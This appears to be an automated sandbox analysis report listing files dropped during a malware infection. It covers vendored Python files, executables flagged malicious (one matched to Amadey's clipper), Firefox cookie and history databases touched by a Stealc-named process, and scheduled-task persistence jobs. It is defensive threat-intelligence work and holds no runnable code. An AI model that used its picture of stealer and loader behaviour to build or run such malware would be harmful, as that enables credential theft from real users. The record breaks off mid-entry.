                                                                                                                                                                                                                                                  SHA-512:A0063220ECDD22C3E735ACFF6DE559ACF3AC4C37B81D37633975A22A28B026F1935CD1957C0FF7D2ECC8B7F83F250310795EECC5273B893FFAB115098F7B9C38
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:Wheel-Version: 1.0.Generator: setuptools (70.1.1).Root-Is-Purelib: true.Tag: py3-none-any..

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\top_level.txt

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):19
                                                                                                                                                                                                                                                  Entropy (8bit):3.536886723742169
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:JSej0EBERG:50o4G
                                                                                                                                                                                                                                                  MD5:A24465F7850BA59507BF86D89165525C
                                                                                                                                                                                                                                                  SHA1:4E61F9264DE74783B5924249BCFE1B06F178B9AD
                                                                                                                                                                                                                                                  SHA-256:08EDDF0FDCB29403625E4ACCA38A872D5FE6A972F6B02E4914A82DD725804FE0
                                                                                                                                                                                                                                                  SHA-512:ECF1F6B777970F5257BDDD353305447083008CEBD8E5A27C3D1DA9C7BDC3F9BF3ABD6881265906D6D5E11992653185C04A522F4DB5655FF75EEDB766F93D5D48
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:importlib_metadata.

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor\jaraco\text\Lorem ipsum.txt

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (888)
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1335
                                                                                                                                                                                                                                                  Entropy (8bit):4.226823573023539
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:FP6Hbz+g9RPZ14bJi04L6GEbX4UQF4UkZQhxI2EIhNyu:9E+i6bJmLm43+Uxxnh0u
                                                                                                                                                                                                                                                  MD5:4CE7501F6608F6CE4011D627979E1AE4
                                                                                                                                                                                                                                                  SHA1:78363672264D9CD3F72D5C1D3665E1657B1A5071
                                                                                                                                                                                                                                                  SHA-256:37FEDCFFBF73C4EB9F058F47677CB33203A436FF9390E4D38A8E01C9DAD28E0B
                                                                                                                                                                                                                                                  SHA-512:A4CDF92725E1D740758DA4DD28DF5D1131F70CEF46946B173FE6956CC0341F019D7C4FECC3C9605F354E1308858721DADA825B4C19F59C5AD1CE01AB84C46B24
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum..Curabitur pretium tincidunt lacus. Nulla gravida orci a odio. Nullam varius, turpis et commodo pharetra, est eros bibendum elit, nec luctus magna felis sollicitudin mauris. Integer in mauris eu nibh euismod gravida. Duis ac tellus et risus vulputate vehicula. Donec lobortis risus a elit. Etiam tempor. Ut ullamcorper, ligula eu tempor congue, eros est euismod turpis, id tincidunt sapien risus a quam. Maecenas fermentum consequat mi. Donec fermentum. Pellentesque malesuada nulla a mi. Duis sapien sem, aliquet nec, commodo eget, consequat quis, neque.

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor\wheel-0.43.0.dist-info\INSTALLER

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4
                                                                                                                                                                                                                                                  Entropy (8bit):1.5
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:Mn:M
                                                                                                                                                                                                                                                  MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                                  SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                                  SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                                  SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:pip.

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txt

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1107
                                                                                                                                                                                                                                                  Entropy (8bit):5.115074330424529
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:PWmrRONJHLH0cPP3gtkHw1h39QHOsUv4eOk4/+jvho3nPz:ttONJbbvE/NQHOs5eNS3n7
                                                                                                                                                                                                                                                  MD5:7FFB0DB04527CFE380E4F2726BD05EBF
                                                                                                                                                                                                                                                  SHA1:5B39C45A91A556E5F1599604F1799E4027FA0E60
                                                                                                                                                                                                                                                  SHA-256:30C23618679108F3E8EA1D2A658C7CA417BDFC891C98EF1A89FA4FF0C9828654
                                                                                                                                                                                                                                                  SHA-512:205F284F3A7E8E696C70ED7B856EE98C1671C68893F0952EEC40915A383BC452B99899BDC401F9FE161A1BF9B6E2CEA3BCD90615EEE9173301657A2CE4BAFE14
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:MIT License..Copyright (c) 2012 Daniel Holth <dholth@fastmail.fm> and contributors..Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR.OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERW

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor\wheel-0.43.0.dist-info\METADATA

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2153
                                                                                                                                                                                                                                                  Entropy (8bit):5.088249746074878
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:DEhpFu5MktjaywDK48d+md+7uT8RfkD1UKd+mOl1Awry:DEhpiMktjayq/7kOfsUzmbYy
                                                                                                                                                                                                                                                  MD5:EBEA27DA14E3F453119DC72D84343E8C
                                                                                                                                                                                                                                                  SHA1:7CEB6DBE498B69ABF4087637C6F500742FF7E2B4
                                                                                                                                                                                                                                                  SHA-256:59BAC22B00A59D3E5608A56B8CF8EFC43831A36B72792EE4389C9CD4669C7841
                                                                                                                                                                                                                                                  SHA-512:A41593939B9325D40CB67FD3F41CD1C9E9978F162487FB469094C41440B5F48016B9A66BE2E6E4A0406D6EEDB25CE4F5A860BA1E3DC924B81F63CEEE3AE31117
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:Metadata-Version: 2.1.Name: wheel.Version: 0.43.0.Summary: A built-package format for Python.Keywords: wheel,packaging.Author-email: Daniel Holth <dholth@fastmail.fm>.Maintainer-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Dist: pytest >= 6.0.0 ; extra == "test".Requires-Dist: setuptools >= 65 ; extra == "test".Project-URL: Changelog, https://wheel.readthedocs.io/en/s

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor\wheel-0.43.0.dist-info\RECORD

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4557
                                                                                                                                                                                                                                                  Entropy (8bit):5.714200636114494
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:QXVuEmegx01TQIvFCiq9H/H7vp88FxTXiJPkGJP4CWweXQHmnDpMI78IegK5EeZR:QXVxAbYkU4CWweXQHmnDpMeV2BvTRqQF
                                                                                                                                                                                                                                                  MD5:44D352C4997560C7BFB82D9360F5985A
                                                                                                                                                                                                                                                  SHA1:BE58C7B8AB32790384E4E4F20865C4A88414B67A
                                                                                                                                                                                                                                                  SHA-256:783E654742611AF88CD9F00BF01A431A219DB536556E63FF981C7BD673070AC9
                                                                                                                                                                                                                                                  SHA-512:281B1D939A560E6A08D0606E5E8CE15F086B4B45738AB41ED6B5821968DC8D764CD6B25DB6BA562A07018C271ABF17A6BC5A380FAD05696ADF1D11EE2C5749C8
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:../../bin/wheel,sha256=cT2EHbrv-J-UyUXu26cDY-0I7RgcruysJeHFanT1Xfo,249..wheel-0.43.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..wheel-0.43.0.dist-info/LICENSE.txt,sha256=MMI2GGeRCPPo6h0qZYx8pBe9_IkcmO8aifpP8MmChlQ,1107..wheel-0.43.0.dist-info/METADATA,sha256=WbrCKwClnT5WCKVrjPjvxDgxo2tyeS7kOJyc1GaceEE,2153..wheel-0.43.0.dist-info/RECORD,,..wheel-0.43.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..wheel-0.43.0.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..wheel-0.43.0.dist-info/entry_points.txt,sha256=rTY1BbkPHhkGMm4Q3F0pIzJBzW2kMxoG1oriffvGdA0,104..wheel/__init__.py,sha256=D6jhH00eMzbgrXGAeOwVfD5i-lCAMMycuG1L0useDlo,59..wheel/__main__.py,sha256=NkMUnuTCGcOkgY0IBLgBCVC_BGGcWORx2K8jYGS12UE,455..wheel/__pycache__/__init__.cpython-312.pyc,,..wheel/__pycache__/__main__.cpython-312.pyc,,..wheel/__pycache__/_setuptools_logging.cpython-312.pyc,,..wheel/__pycache__/bdist_wheel.cpython-312.pyc,,..wheel/__pycache

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor\wheel-0.43.0.dist-info\WHEEL

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):81
                                                                                                                                                                                                                                                  Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                                                  MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                                                  SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                                                                                                                                                                  SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                                                  SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\setuptools\_vendor\wheel-0.43.0.dist-info\entry_points.txt

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):104
                                                                                                                                                                                                                                                  Entropy (8bit):4.271713330022269
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:1SSAnAYgh+MWTMhk6WjrAM5t5ln:1Jb9WTMhk9jUM5t5ln
                                                                                                                                                                                                                                                  MD5:6180E17C30BAE5B30DB371793FCE0085
                                                                                                                                                                                                                                                  SHA1:E3A12C421562A77D90A13D8539A3A0F4D3228359
                                                                                                                                                                                                                                                  SHA-256:AD363505B90F1E1906326E10DC5D29233241CD6DA4331A06D68AE27DFBC6740D
                                                                                                                                                                                                                                                  SHA-512:69EAE7B1E181D7BA1D3E2864D31E1320625A375E76D3B2FBF8856B3B6515936ACE3138D4D442CABDE7576FCFBCBB0DEED054D90B95CFA1C99829DB12A9031E26
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:[console_scripts].wheel=wheel.cli:main..[distutils.commands].bdist_wheel=wheel.bdist_wheel:bdist_wheel..

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\sqlite3.dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1445800
                                                                                                                                                                                                                                                  Entropy (8bit):6.579172773828651
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:tU3g/eNVQHzcayG7b99ZSYR4eXj98nXMuVp+qbLKeq98srCIS:ck3hbEAp8X9Vp+2q2gI
                                                                                                                                                                                                                                                  MD5:926DC90BD9FAF4EFE1700564AA2A1700
                                                                                                                                                                                                                                                  SHA1:763E5AF4BE07444395C2AB11550C70EE59284E6D
                                                                                                                                                                                                                                                  SHA-256:50825EA8B431D86EC228D9FA6B643E2C70044C709F5D9471D779BE63FF18BCD0
                                                                                                                                                                                                                                                  SHA-512:A8703FF97243AA3BC877F71C0514B47677B48834A0F2FEE54E203C0889A79CE37C648243DBFE2EE9E1573B3CA4D49C334E9BFE62541653125861A5398E2FE556
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|{.............e.......g.......g.......g.......g......Po...............g.......g.......g.....g......Rich............PE..d....L.b.........." ... ..................................................... .......`....`..............................................!...................0...........)......|...Pg..T............................f..@............ ..(............................text............................... ..`.rdata..D.... ......................@..@.data...0A.......8..................@....pdata.......0......................@..@.rsrc...............................@..@.reloc..|...........................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\unicodedata.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1121192
                                                                                                                                                                                                                                                  Entropy (8bit):5.384501252071814
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:bMYYMmuZ63NoQCb5Pfhnzr0ql8L8koM7IRG5eeme6VZyrIBHdQLhfFE+uz9O:AYYuXZV0m8wMMREtV6Vo4uYz9O
                                                                                                                                                                                                                                                  MD5:102BBBB1F33CE7C007AAC08FE0A1A97E
                                                                                                                                                                                                                                                  SHA1:9A8601BEA3E7D4C2FA6394611611CDA4FC76E219
                                                                                                                                                                                                                                                  SHA-256:2CF6C5DEA30BB0584991B2065C052C22D258B6E15384447DCEA193FDCAC5F758
                                                                                                                                                                                                                                                  SHA-512:A07731F314E73F7A9EA73576A89CCB8A0E55E53F9B5B82F53121B97B1814D905B17A2DA9BD2EDA9F9354FC3F15E3DEA7A613D7C9BC98C36BBA653743B24DFC32
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(..F...F...F......F..G...F..C...F..B...F..E...F...G...F.C.G...F...G...F...K...F...F...F.......F...D...F.Rich..F.........................PE..d....K.b.........." ... .B...........*.......................................@......Y.....`.............................................X...(........ ...................)...0......@b..T............................a..@............`..x............................text....A.......B.................. ..`.rdata......`.......F..............@..@.data...............................@....pdata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):3277824
                                                                                                                                                                                                                                                  Entropy (8bit):6.665777492235047
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:98304:QJoGB5k1VSBgkTXgyGp0d3WUQ5Ts8wRWAQ2Pyd5t:QcPOhUTs8wRLA5t
                                                                                                                                                                                                                                                  MD5:97AF5B90F7A80FC9629DD3A0D3DC92A8
                                                                                                                                                                                                                                                  SHA1:E2E2303C04C1A06473CAE325C373B8A398A312F6
                                                                                                                                                                                                                                                  SHA-256:54851114E60D122332CE48525C5923D93232F58509FB3DFA292B7CE49D2D7315
                                                                                                                                                                                                                                                  SHA-512:586849599813A97C5A6E3832D82C5067BD508CA3291DB08D12B77F903ADBDC1CA99F0BFCAAD857BCF631A3CEE3CB6141A38CA37CFDF6EE75CB80B6DEF363951C
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................2...........@..........................@2.....".3...@.................................W...k.............................1...............................1..................................................... . ............................@....rsrc...............................@....idata ............................@...xsrqoxbv.P+......F+.................@...frrbcldo......2.......1.............@....taggant.0....2.."....1.............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1004899001\am209.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):439808
                                                                                                                                                                                                                                                  Entropy (8bit):6.48944055080441
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:as9C0eaieHm71o2pL2IMJDoMc2ZNu5GQpsnp/yFPMsXnQODVNIg+cTtgJ7AO+Zj5:as9C0eaieHmO292D3//yFPMsXkJ7gmk
                                                                                                                                                                                                                                                  MD5:CE27255F0EF33CE6304E54D171E6547C
                                                                                                                                                                                                                                                  SHA1:E594C6743D869C852BF7A09E7FE8103B25949B6E
                                                                                                                                                                                                                                                  SHA-256:82C683A7F6E0B4A99A6D3AB519D539A3B0651953C7A71F5309B9D08E4DAA7C3C
                                                                                                                                                                                                                                                  SHA-512:96CFAFBAB9138517532621D0B5F3D4A529806CFDF6191C589E6FB6EBF471E9DF0777FB74E9ABBFE4E8CD8821944AD02B1F09775195E190EE8CA5D3FD151D20D9
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe, Author: Joe Security
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........BS..,...,...,.../...,...).#.,..(...,../...,..)...,.......,...(...,...-...,...-.j.,.U.%...,.U.....,.U.....,.Rich..,.........PE..L...Q.-g.........................................@..........................0............@.................................@E...................................E......8...............................@...............<............................text............................... ..`.rdata..PH.......J..................@..@.data....m...`...,...B..............@....rsrc................n..............@..@.reloc...E.......F...p..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Windows\Tasks\axplong.job

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\ebjtOH70jl.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):286
                                                                                                                                                                                                                                                  Entropy (8bit):3.393815721945155
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:rMN1FXpRKUEZ+lX1lOJUPelkDdtPjgsW2YRZuy0l+t0:QN1BpRKQ1lOmeeDHjzvYRQV+t0
                                                                                                                                                                                                                                                  MD5:BE4BDA16C79E309067D988C32EA5A48B
                                                                                                                                                                                                                                                  SHA1:8936B9924A4BED64DBA38735A720033CC321B879
                                                                                                                                                                                                                                                  SHA-256:086079AEC63A95ECF4B0119B87DE979947CE85779B5E5C1742D0881D1A8FD031
                                                                                                                                                                                                                                                  SHA-512:2F4BFE0C190737C57C0ADBABDC34C99ED7A026C08985D49A4E5A84EE032C06212AD9C1027DBBF8E56F128A9D52DEF5A076E9A49F8DFDD75B61BC93288CE01836
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:....u.....rD..0...ZjF.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................2.@3P.........................

                                                                                                                                                                                                                                                  C:\Windows\Tasks\defnur.job

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1004899001\am209.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):284
                                                                                                                                                                                                                                                  Entropy (8bit):3.376745775325293
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:3E/c6VXflNeRKUEZ+lX18GCk4M6tPjgsW2YRZuy0lqEt0:3WHRf2RKQ18GV4MAjzvYRQV3t0
                                                                                                                                                                                                                                                  MD5:36F569CC417D9B0E9B308B85136E19DC
                                                                                                                                                                                                                                                  SHA1:44C49FAF97DF72D9FA3E1D7F719E869A10488CE7
                                                                                                                                                                                                                                                  SHA-256:ED9030976AC73204EE55C1C87A1507DC586EEC40D4584980E862F7A11DEE598B
                                                                                                                                                                                                                                                  SHA-512:EAD41922F01BF4AAD2FBFF480AACC4E27C8063B1961FE3D6EB23193146D67B941EB20F15004C1C52F2B85E0FD43F5C36161F9646B6ACF9DB8BE4C3CD17A9521F
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:....xW(..'.C.[....-F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.f.c.9.e.0.a.a.a.b.7.\.d.e.f.n.u.r...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................

                                                                                                                                                                                                                                                  C:\Windows\Tasks\skotes.job

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):284
                                                                                                                                                                                                                                                  Entropy (8bit):3.3875259128879476
                                                                                                                                                                                                                                                  Encrypted:false
